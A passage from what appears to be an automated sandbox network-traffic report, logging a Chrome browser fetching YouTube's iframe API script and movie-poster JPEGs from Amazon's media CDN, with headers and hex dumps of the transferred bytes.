                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 6e a0 7d fd 09 d1 13 2c 7d 80 ca c8 35 d6 67 f3 2c 7e 29 e4 18 61 88 3c cd cd fd 14 c0 f0 58 47 91 75 85 db 93 40 75 15 81 f1 19 7e e8 e3 bb 57 8c 75 21 74 c0 f9 dc 39 6b 6b 14 22 18 60 62 a7 70 3a 9f 55 a7 32 16 65 d0 b5 5a 11 26 3f 02 da b2 d6 ac 36 a9 7f fe ee 72 8a a5 8f 84 4e 64 82 11 90 11 03 43 78 f0 25 ca 4d bc 80 8c e1 41 24 91 ad c5 b9 5f f6 f7 55 08 2d 5e 65 44 80 3a 83 81 6f 33 5b 8b 17 92 f3 4a c7 de b9 94 b1 0a 2c ac ab 15 64 b9 6c df 13 a1 e4 fc ea 81 8b 93 55 9f 72 3e 52 20 01 89 0a 36 5b aa 56 a6 7f 50 ae d6 02 09 72 72 ad 84 c7 f2 ac a5 b8 d4 34 82 92 ec 67 f4 d5 35 1b 6b a4 9b 13 8b da c3 1e bf 15 d4 6d 62 c5 f0 c0 4e e2 d0 4b d7 e5 82 52 a4 c7 b1 ac 3b 2b 81 e0 17 e2 6a b3 50 63 23 8f bb 22 f2 c7 80 4c 54 e1 cd ec c5 54 2a ca 23 a1 60
                                                                                                                                                                                          Data Ascii: n},}5g,~)a<XGu@u~Wu!t9kk"`bp:U2eZ&?6rNdCx%MA$_U-^eD:o3[J,dlUr>R 6[VPrr4g5kmbNKR;+jPc#"LTT*#`
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: d8 02 cd 2c b2 62 04 ef f5 4c e6 e7 31 f4 db 4f 7d 54 91 d0 81 bd 0c ed 90 e1 a8 bb 43 6e f5 d1 37 1f 33 86 73 b6 a9 de b0 45 dc 46 e4 d7 fb 63 c2 cb 39 af c1 78 9c 37 db 20 5e 7d b8 ea 64 25 a2 03 b1 0f 0a 4e d8 a2 20 ff 00 4e ba ca 5b 5d 0f 29 82 c2 c9 bd 9d 45 da 46 16 4e e5 7e 99 bf 4e 04 26 73 71 a5 b3 cd 0f f5 8f 2b 28 bf 6e a3 0d 4d 74 eb cb 42 96 b3 c5 32 83 b1 52 0b c4 7f a3 81 30 d3 f5 c3 4a b3 1b 15 29 63 f7 d8 20 44 3a fd 96 87 9b 51 76 9d ca e5 76 96 10 bb 48 46 0e 35 08 82 6e 0a 18 d1 1e 08 e6 b1 ff 00 da e7 f6 7a 1e 76 75 14 d7 17 81 21 4d 3b d5 17 7f c4 cd f8 85 1b c5 ca 9c 6e 0a b7 68 79 d9 d4 55 ea 41 54 68 dc aa d8 77 a5 93 13 d0 f1 1f 81 bf 51 ba cf ee 14 55 e1 fc 26 62 38 ec e8 aa e8 5b ff 00 63 1c f4 ee b2 e5 8e 8c 49 dc b0 eb ae aa
                                                                                                                                                                                          Data Ascii: ,bL1O}TCn73sEFc9x7 ^}d%N N[])EFN~N&sq+(nMtB2R0J)c D:QvvHF5nzvu!M;nhyUAThwQU&b8[cI
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 99 d3 07 9a 07 c3 77 8a 37 ff 00 34 42 42 f0 79 3f 7a 1e 5b 8f 7a 03 ef ca 66 4c b4 67 e5 2e 4c 87 1a 4c 27 3c 61 f6 f4 03 bf f3 f6 f4 3b f4 cd 83 4f 40 3a 3e 1f b4 4e dd 37 7c 1d 0b 9a 58 2b b9 45 60 3d d7 94 af ed f7 28 3c b5 c1 32 e0 ae 0b d7 62 aa 9d 70 72 10 02 41 30 54 1c ae e7 15 e1 23 a2 f3 33 a6 4c c7 0a 7d 8a 26 6f a4 cc 09 95 51 83 84 29 08 22 48 fb 14 f9 1e 31 5e 1a 9e 6a 70 ab b6 22 3f 2f b7 26 a1 20 5f c1 34 1c 7f 7f 9a 1c 51 1d 99 76 a5 0e 8a 56 fe ef 65 52 7a 2f 0b 5e c0 ac 57 88 0e 2a 90 75 ce 85 97 8b 66 ef e1 77 a0 f3 7b ba 5b 5c cb 2a 0a f3 b3 a9 72 23 77 ca 2c ee 3d 51 11 0d 53 72 77 68 b3 0b 9d 0f 5e 0b cc 0b de 69 f6 26 ab cd ee f4 e9 33 0c e3 e1 76 15 ad eb ca dd 7c ce d0 fd de cb ca 17 9b e1 5d ce 0b ca a4 d9 e2 7a ae f3 32 e9 6c
                                                                                                                                                                                          Data Ascii: w74BBy?z[zfLg.LL'<a;O@:>N7|X+E`=(<2bprA0T#3L}&oQ)"H1^jp"?/& _4QvVeRz/^W*ufw{[\*r#w,=QSrwh^i&3v|]z2l


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          136192.168.2.1649866142.250.181.784436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:16 UTC442OUTGET /iframe_api HTTP/1.1
                                                                                                                                                                                          Host: www.youtube.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:17 UTC2383INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Expires: Sun, 15 Dec 2024 11:38:17 GMT
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:17 GMT
                                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                          Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9
                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube_main"
                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script'
                                                                                                                                                                                          Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
                                                                                                                                                                                          P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                          Set-Cookie: YSC=4sc1jQW2Mr0; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                                                                          Set-Cookie: __Secure-ROLLOUT_TOKEN=CKbCy86lpvfbhAEQkpeLgNipigMYkpeLgNipigM%3D; Domain=youtube.com; Expires=Fri, 13-Jun-2025 11:38:17 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                                                                          Set-Cookie: VISITOR_INFO1_LIVE=xdtCrHe5nzM; Domain=.youtube.com; Expires=Fri, 13-Jun-2025 11:38:17 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                                                                          Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3D; Domain=.youtube.com; Expires=Fri, 13-Jun-2025 11:38:17 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                          Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version,Accept-Encoding
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1000INData Raw: 33 65 31 0d 0a 76 61 72 20 73 63 72 69 70 74 55 72 6c 20 3d 20 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 5c 2f 73 5c 2f 70 6c 61 79 65 72 5c 2f 66 38 66 35 33 65 31 61 5c 2f 77 77 77 2d 77 69 64 67 65 74 61 70 69 2e 76 66 6c 73 65 74 5c 2f 77 77 77 2d 77 69 64 67 65 74 61 70 69 2e 6a 73 27 3b 74 72 79 7b 76 61 72 20 74 74 50 6f 6c 69 63 79 3d 77 69 6e 64 6f 77 2e 74 72 75 73 74 65 64 54 79 70 65 73 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 79 6f 75 74 75 62 65 2d 77 69 64 67 65 74 2d 61 70 69 22 2c 7b 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 66 75 6e 63 74 69 6f 6e 28 78 29 7b 72 65 74 75 72 6e 20 78 7d 7d 29 3b 73 63 72 69 70 74 55 72 6c 3d 74 74 50 6f 6c 69 63 79 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52
                                                                                                                                                                                          Data Ascii: 3e1var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/f8f53e1a\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptUR
                                                                                                                                                                                          2024-12-15 11:38:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          137192.168.2.1649880151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:17 UTC676OUTGET /images/M/MV5BNjNhNTgyNGQtM2RkMS00YzRmLWFjMWQtZDA2NDU2ODZkMzExXkEyXkFqcGdeQXVyNzc5MjA3OA@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:17 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 25232
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 0575b201-2101-450a-924b-5ebae0f1515c
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sat, 10 Feb 2018 14:07:32 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 02 Dec 2044 15:25:49 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 677548
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:17 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200051-IAD, cache-ewr-kewr1740038-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c5 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 04 06 03 05 07 08 09 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d0 2b f3 7e 83 e7 c6 7e 67 65 1d d2 1f
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5+~~ge
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 27 c6 be ee 19 55 17 dd c3 0e 0c f1 fa 64 d8 eb b6 39 a8 0b 8b 73 f4 7f 9c 3d 1f f3 bd 2a 81 e5 ea 02 0e 1b ad ad 8f 01 a0 6b 7d 7c ae 55 de e9 e6 ed e7 a7 d8 e6 ca e5 be 3d d9 39 77 67 d4 e3 d6 69 55 ab 2b 1d 1b 96 5b b7 36 db 6a 87 3a cd f6 fa f0 ae e7 e4 ea e5 63 b1 55 15 04 f1 af b2 3c 6d ee e1 99 50 f6 f0 c5 1a 44 7e b9 5d 8e bf 61 9a 8a 18 b7 4f 47 79 cb d1 bf 3b d4 01 e5 ea 8d 77 09 de 6f 34 8f 35 5d 7d 58 ef 5a 4e 1f 1b 53 d0 d9 39 74 0c 5e cf ce 69 ba ad cf 5e 71 3e 8f c6 79 db 66 f2 9b 51 dc ea 16 da 77 24 97 d0 d5 8e 53 5b ae fb 5d ec fb ee 37 cf dd e7 ca fd f3 4e a0 07 97 a3 3c 6d ec 9f 1b 7b bc f9 5c 8b ed e1 1f 06 7c 1d 72 9b 1d 66 c7 35 e3 0e 76 f1 e8 cf 38 ee bc 1e 9e e8 9e 48 4e 7d 2f fc 8e e2 ee b9 bb 76 2a 86 e7 cf af 28 5e 30 dc bd 19
                                                                                                                                                                                          Data Ascii: 'Ud9s=*k}|U=9wgiU+[6j:cU<mPD~]aOGy;wo45]}XZNS9t^i^q>yfQw$S[]7N<m{\|rf5v8HN}/v*(^0
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 98 be 38 c3 7b e1 79 61 71 1c 45 55 9c d9 9f 82 f8 5e 53 0f 84 d5 5d dd 85 3d 76 76 f6 14 7d 59 85 a0 67 72 66 7a ec 39 cf 94 ce 1d a5 ac 51 36 48 63 cb 39 3f 93 7c ed 78 ab b3 fe 50 44 c6 39 7f 28 ee 58 09 60 28 f6 a8 ea 6e 2c 21 85 9b f2 38 b8 5d 0b 81 90 02 5e 5f 1d 48 eb 7d 7b 5e 91 32 18 99 f7 ba 2a f8 cb 2f 2b 97 da de 57 38 c7 c3 19 b8 3e 59 ac e3 62 f3 2e 2f 91 e3 3e 13 ce 4e f9 4d 69 d9 d8 93 4e 4d d8 a4 cb b3 b7 1d f2 ee dc 67 f7 65 ec 3b f4 71 9f be 46 4c 33 8b bd 92 72 13 43 3b b2 09 1c 3b 35 82 6c a7 3f c7 0f 6c 47 2f 1f 15 f3 94 72 6e 66 64 d3 bb 36 d5 e6 1d fb f9 93 e8 b8 df e9 8b 02 42 9e 72 7c af 32 59 cb 0c ce 3b 30 4f 9f d7 6f d7 cf a7 2b 3f 0c 93 b4 5d da f0 27 bf 9f c2 19 b8 a3 9f fe 1d be 92 3a 66 cb 6e 68 03 b9 28 2c 34 5b f3 1c 8d
                                                                                                                                                                                          Data Ascii: 8{yaqEU^S]=vv}Ygrfz9Q6Hc9?|xPD9(X`(n,!8]^_H}{^2*/+W8>Yb./>NMiNMge;qFL3rC;;5l?lG/rnfd6Br|2Y;0Oo+?]':fnh(,4[
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 87 d5 77 50 0a 9d e8 5d b5 69 f2 ac eb 11 45 f8 d0 d4 27 b5 2e 15 dd 59 a1 f6 45 42 d5 ab 5e e7 b9 ab 04 3e d0 8f 5b 99 dc 73 7a c7 96 8c 8d 06 af 64 bf 1e 67 71 55 d4 2c 1c 82 32 5d d4 a7 ad 29 02 ad ab 47 37 42 d4 6e 4f 57 0e 1c d6 73 0d f1 49 a9 d8 fc a3 2d 66 c8 f7 0d 66 c1 76 ad 65 a7 6c b7 88 f6 6f 17 f5 69 df 70 fa 6f eb 0d 1e 42 1d d9 77 23 1f 33 a8 7b 46 e5 66 aa ec 09 ad bc 71 70 c2 bd 00 80 5a 5b 76 f5 43 b1 ed 1a 7e 54 3a cd a8 4c 33 cb 21 86 a0 07 6e 00 e1 47 46 ec 5f 87 0b 51 52 5b b7 09 6d 2d 51 9a c4 11 58 1a b5 7c de e1 1e 3c d5 73 0c b0 ce 55 cd 8c 29 14 72 ef 9e 3b 10 05 81 d8 76 2b cb a7 1b 13 51 d5 06 d7 b5 fc 1d 37 66 f1 7f 56 9d f7 0f a2 ff 00 9c b1 90 8c 74 8b 2f d1 56 d1 22 8f ac 8f ed 6e 87 a7 5c 94 88 ca 2a 12 d5 f7 00 e9 76 ac
                                                                                                                                                                                          Data Ascii: wP]iE'.YEB^>[szdgqU,2])G7BnOWsI-ffveloipoBw#3{FfqpZ[vC~T:L3!nGF_QR[m-QX|<sU)r;v+Q7fVt/V"n\*v
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 45 86 4c fd 91 17 f4 b7 af ed fc 30 9f d2 65 8c a3 2e ec b2 98 b2 f8 5b 9d 39 63 19 df fe dc bb 3a 77 7c 65 71 33 95 bb aa 72 da ee 88 b6 f4 42 f9 61 59 e8 98 d6 f5 bd 67 a3 ad eb 3d dd 39 61 3f 4e db ba 65 39 61 6e fc 93 9b f5 59 4c 59 76 5b d6 e4 de 0f e0 ef 85 b9 f3 84 27 d9 31 67 08 4b a2 17 5b b1 df 7e 13 97 4c ad ee b7 ad cb 77 4c a0 ea b7 f5 64 c7 95 fd a6 2e 88 4b ba df dd 11 e3 72 72 db 84 c7 db 3b d6 56 7a 27 2e cb 77 fb de eb 7a 62 ce 11 13 ac ad ee 8e 46 06 cb f9 ec 3e 1d 8b 77 6f 0e 3f 57 64 ef dd 65 d6 e7 4e 7d 93 12 67 fd 2e be bc 78 58 03 33 06 17 85 b6 b3 35 41 20 dc c5 e1 c3 6e ab 19 5b 56 d5 b5 63 1f bb b7 f4 b1 95 b5 6d 4c 3d d6 d5 85 85 9f 0c ac ac f8 e1 61 61 61 37 45 8f 47 ff c4 00 2a 11 00 02 01 02 05 04 03 01 01 01 00 03 00 00 00
                                                                                                                                                                                          Data Ascii: EL0e.[9c:w|eq3rBaYg=9a?Ne9anYLYv['1gK[~LwLd.Krr;Vz'.wzbF>wo?WdeN}g.xX35A n[VcmL=aaa7EG*
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 4e cd 0b b3 a4 f1 c5 f7 7c 51 38 a0 71 44 e2 81 9b 1a 54 d0 c5 a6 1f 5f 9b 3f e7 46 2d 30 fa 7c 95 a6 7f ce 8c 5a 61 f5 1b 37 d8 a2 fe 3c ff 00 9d 18 b4 c3 ea 56 96 5f c5 9f f3 a3 16 98 7d 7a 94 5b 74 8b 13 be 9c ff 00 5a 31 69 87 d7 aa 18 ef b1 fc 68 3d cc fe 3e 27 b6 a4 92 4a ba 33 7d 6a b4 c3 eb d5 1c 89 44 79 57 d6 f7 fd 72 99 b1 42 1e ae 0e 2e 9e b9 bf 3a 31 69 87 d3 a6 b5 86 55 1b 63 b6 ed d7 46 6f ad 1f 91 69 87 d3 a6 c7 2a 39 17 71 64 4d d7 56 6f ce ab 4c 3e bd 16 39 bf 0b 74 ea cf ed e1 3b ec 6e 92 7d fa 33 7d 6a b4 c3 eb d1 2c ad f6 8c 94 92 48 51 7e d2 82 9d 15 2d ed 38 a4 bb 49 ce bb c5 4a d5 eb 9f eb 55 a6 1f 4d 1b 48 e4 6d 9c 8e fb ee 6b bb 73 7e 49 39 5f 6d cd 79 dd 25 21 cd d8 e0 df 88 b7 75 23 3f d6 8f c8 b4 c4 ea 07 22 1d 3e ed 24 90 94
                                                                                                                                                                                          Data Ascii: N|Q8qDT_?F-0|Za7<V_}z[tZ1ih=>'J3}jDyWrB.:1iUcFoi*9qdMVoL>9t;n}3}j,HQ~-8IJUMHmks~I9_my%!u#?">$
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 7e dd 15 89 33 42 d2 18 53 6b 8d e8 88 86 20 bf be 67 e5 d0 5b 03 81 14 51 41 07 e9 04 fe db d1 31 11 50 6f d8 a1 30 11 8c 27 5b d2 4a 7e 9e 81 0a de 03 ab 84 d5 62 8a 1d da de 88 4e d6 c9 1c 7c bd f3 3f 2f c3 43 b9 6a 99 c3 16 05 a7 09 46 58 dc 85 d3 b4 35 63 fd b1 5a 82 06 60 27 3b d3 98 a2 69 3b 0b c5 a3 92 bb de f3 f2 fc 5a 38 62 38 91 35 07 f5 34 66 fd c6 78 d5 6a 85 0b b8 d5 14 9f da f4 5e 2b cf 97 80 97 4c 89 bf 04 77 9e 28 fa fd d0 de bc 9f c9 d1 7f 74 cf cb f1 ca 38 68 7d 0d fc 14 24 c5 85 61 f1 a2 ab 4b 2f c1 38 45 a0 db 3a dd fc 36 aa 1a 74 4d bc fe cb 82 2c 47 7a bc 0f 73 cf cb da 56 e1 89 43 fa 9a 2f 06 fd c2 bf ad a3 7a 4e aa 38 a1 24 f5 48 b7 e4 d5 51 40 0b 52 d4 fc 96 92 d6 50 ff 00 91 e0 b4 66 22 7b 51 17 00 fe 91 ea ab 64 3f b9 e7 e5 ed
                                                                                                                                                                                          Data Ascii: ~3BSk g[QA1Po0'[J~bN|?/CjFX5cZ`';i;Z8b854fxj^+Lw(t8h}$aK/8E:6tM,GzsVC/zN8$HQ@RPf"{Qd?
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: e4 8c af 8f d0 72 c1 48 0e 5c 95 d4 c7 e2 fb 79 a6 71 8c c2 8a 1f 04 69 40 02 eb 9a 8f 28 51 9c 57 ab 0c 06 1f 75 62 67 0e f3 7a ba 7e 83 d5 3b c4 d4 c9 08 bc 3e ea 85 b7 06 57 43 06 e2 9b 59 9d f2 f0 56 37 f1 56 66 24 d8 84 67 82 6b 57 3d 16 97 46 3f 29 84 82 31 1d 7b 96 92 13 6c d0 48 79 9a f3 7a 86 cc 26 2d 57 d6 d1 80 59 c6 33 ee 13 6c 14 3f d3 8a 41 fb 18 02 7f e2 7b b0 46 bd 4d 26 3f 96 2f cd ff 00 25 28 f7 47 fa b8 dc bf a7 a6 ed 42 7f fd 62 30 8b ee 83 44 2e f5 18 8f 62 5b 3b fe ca 50 61 43 17 00 9a 18 61 1b 00 52 d1 ff 00 cb 6f 05 d5 ec c3 8e 67 2c 31 e8 a0 a9 c4 e1 dc a9 0f 57 33 8f 72 ea c1 4c cd e7 d1 41 68 9c e8 16 87 7f d9 41 66 ca c5 be 59 28 a2 06 21 73 37 92 26 20 2a f5 19 a2 61 1f 10 bb 6d 64 a8 34 65 bc 10 76 79 62 eb 43 bc 70 5a 1d e3
                                                                                                                                                                                          Data Ascii: rH\yqi@(QWubgz~;>WCYV7Vf$gkW=F?)1{lHyz&-WY3l?A{FM&?/%(GBb0D.b[;PaCaRog,1W3rLAhAfY(!s7& *amd4evybCpZ
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: d3 32 cf 20 72 00 d1 a6 3b c7 1b b7 d4 43 b6 50 a4 46 69 0c 86 1f 25 41 de d0 48 12 08 5b 47 0a a1 52 f2 6c 8c 44 0d 59 14 18 19 99 95 12 0a 02 13 90 74 44 b6 ab 88 c7 03 75 ca 7b 20 31 e7 b3 86 94 5c 9a 9a 69 44 2c 34 bb 9a 85 82 c5 cc c1 0c 09 35 77 12 e0 42 46 40 ac 0e bb 7b 39 8e 65 38 08 16 b9 c5 9b 50 48 64 b2 f3 55 e1 e8 62 26 66 07 a7 e2 e1 41 33 79 4c 07 86 2c 1b 60 c0 c4 59 62 8c 95 a6 88 0e f1 7b 6c 44 d6 8a 81 01 28 12 32 3a eb 0d 3c 60 4c db e4 0a d6 a6 bd 62 96 13 ee 4c 12 4c d7 40 6f 4f f5 21 07 94 c2 12 13 e8 5d f2 7b cc 30 82 2c 04 8f 93 51 41 c0 fc 4c 02 11 f5 15 44 10 24 96 03 22 60 27 78 75 06 e4 04 59 08 04 22 05 a0 9a 21 90 18 24 67 ca 2a ca ba c8 16 ad 8b 83 62 f0 07 5c 26 35 de 0d 27 14 4e c0 61 b4 ad 50 d6 3c 13 8e 05 8b 2d c3 07
                                                                                                                                                                                          Data Ascii: 2 r;CPFi%AH[GRlDYtDu{ 1\iD,45wBF@{9e8PHdUb&fA3yL,`Yb{lD(2:<`LbLL@oO!]{0,QALD$"`'xuY"!$g*b\&5'NaP<-
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 4d 02 06 fa d7 3d 44 45 24 36 b9 10 08 d6 82 b8 bd 60 be f0 80 24 06 14 55 00 1c a4 06 26 a4 20 1d 57 fc 22 0c 7d 41 e3 f3 f9 7d 44 87 80 91 3d d9 84 e3 94 0e 4d 61 25 4b b2 07 05 01 cb fd 07 ed b1 86 7c 68 17 93 65 56 64 6b a9 70 31 80 28 c1 54 1d 11 e4 f1 04 14 cf 35 01 92 32 09 d0 75 7a 40 db 6b 5f ca c7 88 30 e5 54 08 cf 39 a8 08 f4 5e 18 d6 2b 9e ba 18 35 18 80 35 83 0c 73 86 32 3e de 1f 65 f1 79 7d 61 d6 f8 70 24 e8 6d 7b 88 52 57 25 00 f3 06 e6 e5 74 98 55 14 05 a1 b3 7a b4 34 09 7d 19 99 77 13 03 cd 22 b6 1c e0 31 8c 20 96 e1 03 ec 71 2c 5d 0d 37 eb 19 82 66 77 e1 c6 a3 05 58 c8 b4 4b 68 70 76 80 c5 e1 ba 56 8e 8a 3a e7 59 51 a7 96 cf ed 60 3e cb e2 f2 fb 82 a5 34 06 39 30 39 df a0 83 66 49 c6 40 01 03 57 97 7b e6 21 a6 05 37 32 01 12 39 c6 33 59
                                                                                                                                                                                          Data Ascii: M=DE$6`$U& W"}A}D=Ma%K|heVdkp1(T52uz@k_0T9^+55s2>ey}ap$m{RW%tUz4}w"1 q,]7fwXKhpvV:YQ`>4909fI@W{!7293Y


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          138192.168.2.1649881151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:17 UTC413OUTGET /images/M/MV5BMTQ3NjU1NjU1Ml5BMl5BanBnXkFtZTcwODIxNzYxMQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
